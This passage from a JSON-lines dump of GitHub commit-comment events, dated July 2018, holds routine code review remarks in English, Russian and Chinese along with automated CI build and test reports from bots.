test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T09:42:27Z"}
{"id":"8042932909","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29901139,"position":null,"line":null,"path":null,"commit_id":"8bfccc05ccd263e24a411c6217f19e23df6caf7c","created_at":"2018-07-31T09:42:28Z","updated_at":"2018-07-31T09:42:28Z","author_association":"NONE","body":"expanded-runperiod (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1707 of 1707 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.43%25-green.png)</a>\n"}},"created_at":"2018-07-31T09:42:28Z"}
{"id":"8042933724","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29901140,"position":45,"line":50,"path":"Lesson3/train.rb","commit_id":"77b333383b773e43935da7f0a17a9031e610e75c","created_at":"2018-07-31T09:42:37Z","updated_at":"2018-07-31T09:42:37Z","author_association":"NONE","body":"или `route.stations[@current_index]`. Не думаю, что ради этого стоило экстрактить метод"}},"created_at":"2018-07-31T09:42:37Z"}
{"id":"8042934036","type":"CommitCommentEvent","actor":{"login":"voducmanh144"},"repo":{"name":"NHuyHoang/plc_s71200"},"payload":{"comment":{"id":29901141,"position":6,"line":18,"path":"view/index.html","commit_id":"5a6a6a99dffcbe3f237f8784dc798ac5fcaea77b","created_at":"2018-07-31T09:42:41Z","updated_at":"2018-07-31T09:42:41Z","author_association":"COLLABORATOR","body":"dung r\r\n"}},"created_at":"2018-07-31T09:42:41Z"}
{"id":"8042937843","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29901152,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-31T09:43:25Z","updated_at":"2018-07-31T09:43:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T09:43:25Z"}
{"id":"8042938313","type":"CommitCommentEvent","actor":{"login":"AbuBaniaz"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29901153,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:43:30Z","updated_at":"2018-07-31T09:43:30Z","author_association":"CONTRIBUTOR","body":"The explanation is on the Vix forum.\r\n\r\nSee PLi forum for the nit pick personal comments at PR2."}},"created_at":"2018-07-31T09:43:30Z"}
{"id":"8042941307","type":"CommitCommentEvent","actor":{"login":"aubincleme"},"repo":{"name":"xwiki-contrib/application-blockly"},"payload":{"comment":{"id":29901163,"position":14,"line":40,"path":"pom.xml","commit_id":"7193f870f7f9119d817ebcc1f1a1fd440b76fa96","created_at":"2018-07-31T09:44:02Z","updated_at":"2018-07-31T09:44:02Z","author_association":"MEMBER","body":"This is kind of strange and shouldn't have been introduce by the maven release plugin IMO ; you can delete the line here."}},"created_at":"2018-07-31T09:44:02Z"}
{"id":"8042950162","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29901184,"position":63,"line":65,"path":"Lesson3/train.rb","commit_id":"77b333383b773e43935da7f0a17a9031e610e75c","created_at":"2018-07-31T09:45:42Z","updated_at":"2018-07-31T09:45:42Z","author_association":"NONE","body":"Уже писал как лучше сделать. На данный момент ни одной из станций не сообщается, что поезд уехал/приехал\r\n\r\nТут должна быть проверка, если есть следующая станция\r\n```\r\nif next_station\r\n  - говорим текущей станции, что поезд уехал\r\n  - говорим следующей станции, что поезд приехал\r\n  - инкрементим индекс текущей станции\r\n```"}},"created_at":"2018-07-31T09:45:42Z"}
{"id":"8042951590","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901188,"position":15,"line":15,"path":"main.scss","commit_id":"060cd301f81b2afb11efef0c6df23065ca0b2591","created_at":"2018-07-31T09:45:58Z","updated_at":"2018-07-31T09:45:58Z","author_association":"NONE","body":"Не используй `*`\r\nДостаточно задать шрифт для `<html>` или `<body>`, остальные будут наследовать"}},"created_at":"2018-07-31T09:45:58Z"}
{"id":"8042955424","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901194,"position":19,"line":19,"path":"main.scss","commit_id":"060cd301f81b2afb11efef0c6df23065ca0b2591","created_at":"2018-07-31T09:46:41Z","updated_at":"2018-07-31T09:46:41Z","author_association":"NONE","body":"Не пиши стили для тэгов, тем более такие специфические\r\nИспользуй классы"}},"created_at":"2018-07-31T09:46:41Z"}
{"id":"8042958806","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901205,"position":20,"line":20,"path":"main.scss","commit_id":"060cd301f81b2afb11efef0c6df23065ca0b2591","created_at":"2018-07-31T09:47:18Z","updated_at":"2018-07-31T09:47:18Z","author_association":"NONE","body":"`<span>` - это не ссылка, почему ему присвоен цвет `$link-color` ?"}},"created_at":"2018-07-31T09:47:18Z"}
{"id":"8042959711","type":"CommitCommentEvent","actor":{"login":"ranadasuk"},"repo":{"name":"renebock/wonder"},"payload":{"comment":{"id":29901208,"position":13,"line":400,"path":"Frameworks/Core/ERExtensions/Sources/er/extensions/eof/ERXObjectStoreCoordinatorSynchronizer.java","commit_id":"5a8beeecfc902800f3d50824dd77e0e63ae785a5","created_at":"2018-07-31T09:47:28Z","updated_at":"2018-07-31T09:47:28Z","author_association":"NONE","body":"Why did we wrap it around a property conditional? Was that needed or did you anticipate other problems?"}},"created_at":"2018-07-31T09:47:28Z"}
{"id":"8042959779","type":"CommitCommentEvent","actor":{"login":"if4lcon"},"repo":{"name":"awssat/laravel-visits"},"payload":{"comment":{"id":29901209,"position":22,"line":51,"path":"src/Visits.php","commit_id":"d7ff826f58011dfd0549f087f6ad157034b51705","created_at":"2018-07-31T09:47:28Z","updated_at":"2018-07-31T09:47:28Z","author_association":"COLLABORATOR","body":"I know but it this an old name I don't know how to rename and sync the new name "}},"created_at":"2018-07-31T09:47:28Z"}
{"id":"8042960989","type":"CommitCommentEvent","actor":{"login":"saurabheng"},"repo":{"name":"saurabheng/myrepo"},"payload":{"comment":{"id":29901214,"position":null,"line":null,"path":null,"commit_id":"357e571aa92a43a7106d570f241fa951e80d0d12","created_at":"2018-07-31T09:47:42Z","updated_at":"2018-07-31T09:47:42Z","author_association":"OWNER","body":"merge"}},"created_at":"2018-07-31T09:47:42Z"}
{"id":"8042962845","type":"CommitCommentEvent","actor":{"login":"pkofod"},"repo":{"name":"JuliaNLSolvers/NLsolve.jl"},"payload":{"comment":{"id":29901217,"position":5,"line":36,"path":"test/runtests.jl","commit_id":"604be5f9101cf61f29b3f1e5cf4f1227fe213d0d","created_at":"2018-07-31T09:48:03Z","updated_at":"2018-07-31T09:48:03Z","author_association":"CONTRIBUTOR","body":"I hadn't noticed this. @arnavs this seems like a mistake ?"}},"created_at":"2018-07-31T09:48:03Z"}
{"id":"8042965972","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901218,"position":48,"line":48,"path":"main.scss","commit_id":"060cd301f81b2afb11efef0c6df23065ca0b2591","created_at":"2018-07-31T09:48:35Z","updated_at":"2018-07-31T09:48:35Z","author_association":"NONE","body":"Вноси стили псевдоселекторов внутрь стилей этого класса\r\n```\r\n.big-blue-button {\r\n  color: red;\r\n  &:hover {\r\n    color: blue;\r\n  }\r\n}\r\n```"}},"created_at":"2018-07-31T09:48:35Z"}
{"id":"8042967032","type":"CommitCommentEvent","actor":{"login":"axic"},"repo":{"name":"ethereum/solidity"},"payload":{"comment":{"id":29901224,"position":19,"line":761,"path":"libsolidity/analysis/TypeChecker.cpp","commit_id":"db91ea2c0c55bf2332d4a1e6b7aa2fcb73e0774f","created_at":"2018-07-31T09:48:47Z","updated_at":"2018-07-31T09:48:47Z","author_association":"MEMBER","body":"Why not just say `\"keys are not supported.\"`"}},"created_at":"2018-07-31T09:48:47Z"}
{"id":"8042970526","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901230,"position":68,"line":68,"path":"main.scss","commit_id":"060cd301f81b2afb11efef0c6df23065ca0b2591","created_at":"2018-07-31T09:49:21Z","updated_at":"2018-07-31T09:49:21Z","author_association":"NONE","body":"За исключением крайне редких случаев, никогда не используй селектор `*`"}},"created_at":"2018-07-31T09:49:21Z"}
{"id":"8042973017","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29901236,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-31T09:49:47Z","updated_at":"2018-07-31T09:49:47Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T09:49:47Z"}
{"id":"8042974138","type":"CommitCommentEvent","actor":{"login":"legomanbuilder"},"repo":{"name":"legomanbuilder/leomanbuilder.github.io"},"payload":{"comment":{"id":29901238,"position":null,"line":null,"path":null,"commit_id":"73f119a0654f895db951363cdbe643ebdbb1a787","created_at":"2018-07-31T09:50:00Z","updated_at":"2018-07-31T09:50:00Z","author_association":"OWNER","body":"Delete CNAME"}},"created_at":"2018-07-31T09:50:00Z"}
{"id":"8042981918","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29901255,"position":null,"line":null,"path":null,"commit_id":"4c51d62b5318d9686058be09f0d710f58d61f917","created_at":"2018-07-31T09:51:27Z","updated_at":"2018-07-31T09:51:27Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - Win64-Windows-7-VisualStudio-14: OK (2963 of 2964 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 628\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4c51d62b5318d9686058be09f0d710f58d61f917-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4c51d62b5318d9686058be09f0d710f58d61f917-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-31T09:51:27Z"}
{"id":"8042984686","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901260,"position":121,"line":121,"path":"main.scss","commit_id":"060cd301f81b2afb11efef0c6df23065ca0b2591","created_at":"2018-07-31T09:51:59Z","updated_at":"2018-07-31T09:51:59Z","author_association":"NONE","body":"Сотые доли могут некорректно работать в разных браузерах"}},"created_at":"2018-07-31T09:51:59Z"}
{"id":"8042989718","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901266,"position":164,"line":164,"path":"main.scss","commit_id":"060cd301f81b2afb11efef0c6df23065ca0b2591","created_at":"2018-07-31T09:52:53Z","updated_at":"2018-07-31T09:52:53Z","author_association":"NONE","body":"Не используй селекторы по тэгам"}},"created_at":"2018-07-31T09:52:53Z"}
{"id":"8042990871","type":"CommitCommentEvent","actor":{"login":"pangge"},"repo":{"name":"PaddlePaddle/Paddle"},"payload":{"comment":{"id":29901272,"position":15,"line":55,"path":"paddle/fluid/inference/api/api_anakin_engine_tester.cc","commit_id":"d255ac531fac51f1a26578de291bc7ef2bb1db4c","created_at":"2018-07-31T09:53:05Z","updated_at":"2018-07-31T09:53:05Z","author_association":"CONTRIBUTOR","body":"没有format"}},"created_at":"2018-07-31T09:53:05Z"}
{"id":"8042992744","type":"CommitCommentEvent","actor":{"login":"pangge"},"repo":{"name":"PaddlePaddle/Paddle"},"payload":{"comment":{"id":29901274,"position":6,"line":47,"path":"paddle/fluid/inference/api/api_anakin_engine_tester.cc","commit_id":"d255ac531fac51f1a26578de291bc7ef2bb1db4c","created_at":"2018-07-31T09:53:26Z","updated_at":"2018-07-31T09:53:26Z","author_association":"CONTRIBUTOR","body":"好的"}},"created_at":"2018-07-31T09:53:26Z"}
{"id":"8042993111","type":"CommitCommentEvent","actor":{"login":"leonardoalt"},"repo":{"name":"ethereum/solidity"},"payload":{"comment":{"id":29901275,"position":19,"line":761,"path":"libsolidity/analysis/TypeChecker.cpp","commit_id":"db91ea2c0c55bf2332d4a1e6b7aa2fcb73e0774f","created_at":"2018-07-31T09:53:30Z","updated_at":"2018-07-31T09:53:30Z","author_association":"COLLABORATOR","body":"Just copied the assert msg, but I can change it"}},"created_at":"2018-07-31T09:53:30Z"}
{"id":"8042993642","type":"CommitCommentEvent","actor":{"login":"greglandrum"},"repo":{"name":"rdkit/knime-rdkit"},"payload":{"comment":{"id":29901277,"position":null,"line":null,"path":null,"commit_id":"4cd2d335f2c79f5d7f4791c12c6535d48b232ce9","created_at":"2018-07-31T09:53:35Z","updated_at":"2018-07-31T09:53:35Z","author_association":"MEMBER","body":"Yeah, I will bump the version and also do a release.\r\n\r\nout of curiosity though: did the API change between these binaries and the last? I don't think they should have. The commit message just reflects that I had forgotten an option when I did the win64 build that was included in 87372a50ce7a\r\n"}},"created_at":"2018-07-31T09:53:35Z"}
{"id":"8042994702","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901279,"position":186,"line":186,"path":"main.scss","commit_id":"060cd301f81b2afb11efef0c6df23065ca0b2591","created_at":"2018-07-31T09:53:48Z","updated_at":"2018-07-31T09:53:48Z","author_association":"NONE","body":"ставь переносы строк перед вложенным селектором\r\n```\r\n#hiw {\r\n  text-align: center;\r\n\r\n  p {\r\n    font-size: 13px;\r\n  }\r\n}\r\n```"}},"created_at":"2018-07-31T09:53:48Z"}
{"id":"8043001410","type":"CommitCommentEvent","actor":{"login":"sroughley"},"repo":{"name":"rdkit/knime-rdkit"},"payload":{"comment":{"id":29901291,"position":null,"line":null,"path":null,"commit_id":"4cd2d335f2c79f5d7f4791c12c6535d48b232ce9","created_at":"2018-07-31T09:55:02Z","updated_at":"2018-07-31T09:55:02Z","author_association":"NONE","body":"@greglandrum  - thanks!  Yes, the api did chance slightly - those erroneous RWMol#addAtom(Atom, boolean, boolean) methods disappeared again, and the missing RWMol#addAtom(Atom, boolean) methods returned!\r\n\r\nSteve"}},"created_at":"2018-07-31T09:55:02Z"}
{"id":"8043015588","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki-contrib/application-blockly"},"payload":{"comment":{"id":29901309,"position":14,"line":40,"path":"pom.xml","commit_id":"7193f870f7f9119d817ebcc1f1a1fd440b76fa96","created_at":"2018-07-31T09:57:21Z","updated_at":"2018-07-31T09:57:21Z","author_association":"MEMBER","body":"What the release plugin did is actually restoring what was there before the release."}},"created_at":"2018-07-31T09:57:21Z"}
{"id":"8043020272","type":"CommitCommentEvent","actor":{"login":"monotek"},"repo":{"name":"zammad/zammad"},"payload":{"comment":{"id":29901320,"position":13,"line":241,"path":"contrib/packager.io/functions","commit_id":"4a610346ccee0dab0067c40bfdaf22d79da5649b","created_at":"2018-07-31T09:58:19Z","updated_at":"2018-07-31T09:58:19Z","author_association":"MEMBER","body":"ah... sorry... of cause you're right... i'll change..."}},"created_at":"2018-07-31T09:58:19Z"}
